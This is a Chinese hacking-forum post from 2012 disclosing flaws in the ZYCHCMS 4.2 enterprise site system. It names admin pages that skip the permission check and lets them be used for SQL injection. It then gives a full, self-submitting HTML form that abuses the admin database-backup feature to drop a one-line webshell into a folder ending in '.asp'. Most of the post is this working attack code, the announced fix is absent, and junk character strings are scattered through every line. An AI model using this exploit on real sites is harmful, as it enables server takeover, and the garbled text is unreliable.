3 [$ W$ D# g( u* H8 X
5 E2 K' r u% R
+ h# f h t5 ~/ ?
! f2 N7 w; N1 }6 P* |& v! Y# y影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
8 l4 z# K9 W1 T, k$ [ }+ p ①SQL注射漏洞6 n9 J) A3 _& d, t! t
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
0 {* T7 T! N7 T/ x! f 漏洞原因:未过滤! W7 o2 p/ o& K, A5 ]
漏洞代码:9 V; M# s1 e4 n! Q$ ~1 H4 l. i
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。; N8 W3 d$ X" V# X
修复方法:在文件开头加入代码
$ y8 t4 Q0 f1 p0 P% D& W9 O7 @
- N# C1 o5 q! m' ?* B# c# h2 P |! l4 I
②后台拿WBSHELL
6 P9 x: r, \! C* c: T 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。1 f6 K1 S3 e+ U. f' A; v
这里在网上找了一个,改了下,将就着用。
) ^3 L2 Y4 r5 d* d" Y0 M9 ? 以下是代码本地提交代码/ A7 z- r0 E* A
" T: V# H) l4 c0 I
# i: _) ]; z, Q. l" T<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>6 @, z& l# U/ \- E0 z
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
4 J3 A/ F- l8 f4 \! m4 \ <tr>
) V5 @* X. N% R <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
( k! L) x) _/ v* r! G( N </tr>
) `- Q G/ I4 W* y <tr>
7 R7 ~& i: G* R! Z/ L; \+ S <td bgcolor=”#FFFFFF”><span class=”back_southidc”>
1 ]9 g& O; h0 t+ D; K9 a0 l% @ </span>; f. y. o+ x5 J
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
, o7 `+ l5 W2 M& L <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >& y) R- d1 M6 E
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
) c( J* K. r" J7 v <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d6 ^ g( w; R+ q( z& H/ M6 j
<div align=”left”># ^, ]5 v$ G: S6 M
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
. I7 z) E1 s9 p3 T9 N1 T <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
0 G: Y- J1 v8 ] <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />3 _& c! U' O. f3 v; p& d
</div></td>7 d6 y2 u$ Z* G! s. u: }5 y! x
</tr>1 ?. v- A- D& T8 n6 t7 n% v
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>) c3 G* k1 n6 `2 Y; U$ d; j1 D$ \3 p
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td># P! q: T( Y0 e0 r1 _8 J5 l4 X' |3 N
<td class=”td”><div align=”left”>; D$ {; c6 j" Y3 e* k8 Q6 S
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
, `* U% p( ?# T1 N' B: S; l [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
1 a, C9 k: ?5 y; g </tr>
9 t8 E, b4 v1 @5 f <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
+ p# C/ x: z5 C0 e$ d <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
2 C3 ?- ^- Z- I$ x/ Z <td class=”td”><div align=”left”>$ U# p6 P/ I. c% B$ n( l) K
<input type=”submit” value=”确定备份” class=”btn”/ r; v, P$ _- D f5 t, z4 r
</div></td>
; J$ v& [! x0 |+ u6 ~, E# ^ </tr>
: Y# k0 S) `4 L8 }; I% G e6 F </table></td></tr></form>' f$ d$ t3 P/ O: G
</table>8 s( i$ Y! M/ l0 _: e: x9 A5 ~) I0 ?
</td>% n$ y% o9 d# r1 h! P1 C" V# U2 E
</tr>
' p `' Y9 j7 T7 Q3 H </table>
* _1 V9 _: q* i) t" C <script>* y- o4 U0 F, v) ]2 @
document.all.add.submit();$ c8 d" j6 [1 X+ F, Y$ C
</script>/ t' p, w3 N/ o7 e8 a0 j8 Q( t- v
- x/ M8 R, p! E: d
1 i8 X1 o' }+ h( L0 t r$ K7 H
5 o0 m. v* G/ ]) F, p& E- O: H- Z7 t! B$ R
& J9 M0 x, A0 d
3 q7 E# ?8 [1 Z9 b: a
% M4 j @! l% s. a6 o& M
* x1 y$ u! g0 }$ S4 j$ H$ g" W8 R& F; ~+ a I' e
! }1 ]. J: d; c7 Y) g; L. c
|
发表于 2012-9-10 21:09:51
收藏
支持
反对